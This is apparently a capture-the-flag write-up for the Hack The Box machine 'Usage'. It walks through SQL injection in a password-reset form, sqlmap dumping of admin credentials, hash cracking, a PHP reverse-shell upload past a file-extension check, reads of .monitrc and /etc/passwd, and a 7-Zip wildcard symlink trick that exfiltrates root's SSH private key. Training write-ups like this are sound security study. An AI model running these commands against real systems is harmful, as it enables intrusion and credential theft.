htb-writeups

Usage HTB - Writeup

Machine Information

Reconnaissance

Network Scanning

The initial reconnaissance phase began with a comprehensive Nmap scan to identify open ports and services.

export target=10.129.7.62
sudo nmap -p- --min-rate 5000 -sT -vvv $target

image

image

Scan Results:

A follow-up service version detection scan was performed:

sudo nmap -sC -sV -p 22,80 -T4 $target

image

Web Application Discovery

The web service running on port 80 revealed a domain-based application. Added the domain to /etc/hosts:

echo "10.129.7.62 usage.htb" | sudo tee -a /etc/hosts

image

Subdomain Enumeration

Using FFUF for subdomain enumeration:

ffuf -c -u 'http://usage.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.usage.htb' -fs 178

image

Discovered Subdomain:

Added the subdomain to /etc/hosts:

echo "10.129.7.62 admin.usage.htb" | sudo tee -a /etc/hosts

Web Application Analysis

The main application at http://usage.htb featured:

image

registering self at http://usage.htb/registration

image

Note:visiting http://usage.htb/forget-password password reset form when we enter the correct mail we get “We have e-mailed your password reset link to user@mail.com”

image

Note:when we give non existant mail we get “Email address does not match in our records!”

image

Initial Access

SQL Injection Discovery

The password reset functionality at http://usage.htb/forget-password was vulnerable to SQL injection:

Vulnerable Parameter: email

Proof of Concept:

' or 1=1;-- -

image

Database Enumeration

Using SQLMap for automated exploitation:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10

image

forget.req

image

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 --dbs

image

Discovered Databases:

Enumerating tables in the usage_blog database:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 -D usage_blog --tables

Key Tables Identified:

Extracting table names:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 -D usage_blog --tables

image

Extracting administrator credentials:

sqlmap -r forget.req --batch --level 5 --risk 3 -p email --threads 10 -D usage_blog -T admin_users --dump

image

Administrator Credentials:

Password Cracking

Using Hashcat to crack the bcrypt hash:

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

Cracked Password: whatever1

Admin Panel Access

Successfully logged into the admin panel at http://admin.usage.htb/ using the credentials:

image

Technology Stack Identified:

Exploitation

Arbitrary File Upload Vulnerability

Laravel v10.18.0 was vulnerable to CVE-2023-24249 (Arbitrary File Upload).

Exploitation Steps:

  1. Payload Preparation:
    • Modified a PHP reverse shell with attacker IP and port

image

  1. File Upload Bypass:
    • Intercepted the upload request using Burp Suite
    • Modified filename from hello.php.png to hello.php

image

  1. Shell Execution:
    • Accessed the uploaded shell at http://admin.usage.htb/uploads/images/hello.php
    • Obtained reverse shell as user dash

image

Stabilizing the Shell

Upgraded to a fully interactive TTY shell for better control.

image

Privilege Escalation

User Flag

Located and captured the user flag:

cat /home/dash/user.txt

User Flag: e3113fbd4c794577f05fcb58f98cc3eb

Credential Discovery

Discovered Monit configuration file with credentials:

cat /home/dash/.monitrc

Discovered Credentials:

Lateral Movement

User Enumeration

Identified system users:

cat /etc/passwd | grep 'sh$'

Users with Shell Access:

Lateral Movement to Xander

Used discovered credentials to access xander’s account:

su xander

Password: 3nc0d3d_pa$$w0rd

image

Privilege Escalation Vector

Analyzed sudo privileges for xander:

sudo -l

image

Sudo Privileges:

Root Access

Binary Analysis

Analyzed the privileged binary:

strings /usr/bin/usage_management

Binary Functionality:

7-Zip Wildcard Exploitation

Exploited 7-Zip’s wildcard handling vulnerability:

Exploitation Steps:

  1. Create Symbolic Links: 
    cd /var/www/html
ln -s /root/.ssh/id_rsa file
touch @file

image

  1. Execute Privileged Binary: 
    sudo /usr/bin/usage_management

    Selected option 1 (Project Backup)

  2. Extract Root SSH Key:
    • The backup process followed symbolic links
    • Root’s private SSH key was included in the backup

image

Root Shell Access

  1. Transfer and Secure SSH Key: 
    chmod 600 root_key
  2. SSH as Root: 
    ssh -i root_key root@10.129.7.62

image

Root Flag Capture

Located and captured the root flag:

cat /root/root.txt

Root Flag: 348556f166e6f970b0db614541475b5f

Summary

This penetration test demonstrated a comprehensive attack chain:

  1. Information Gathering: Network scanning and subdomain enumeration
  2. Vulnerability Discovery: SQL injection in password reset functionality
  3. Credential Access: Database enumeration and password cracking
  4. Initial Compromise: Arbitrary file upload leading to web shell
  5. Lateral Movement: Credential reuse across user accounts
  6. Privilege Escalation: Wildcard injection in privileged 7-Zip operations

The attack leveraged multiple security weaknesses including input validation flaws, credential management issues, and improper privilege separation.

Mitigation Recommendations

  1. Implement proper input validation and parameterized queries
  2. Enforce strong password policies and implement multi-factor authentication
  3. Apply principle of least privilege for service accounts
  4. Regularly update frameworks and dependencies
  5. Implement proper file upload validation and storage
  6. Conduct regular security assessments and penetration testing

This writeup is for educational purposes only. Always ensure you have proper authorization before conducting security testing.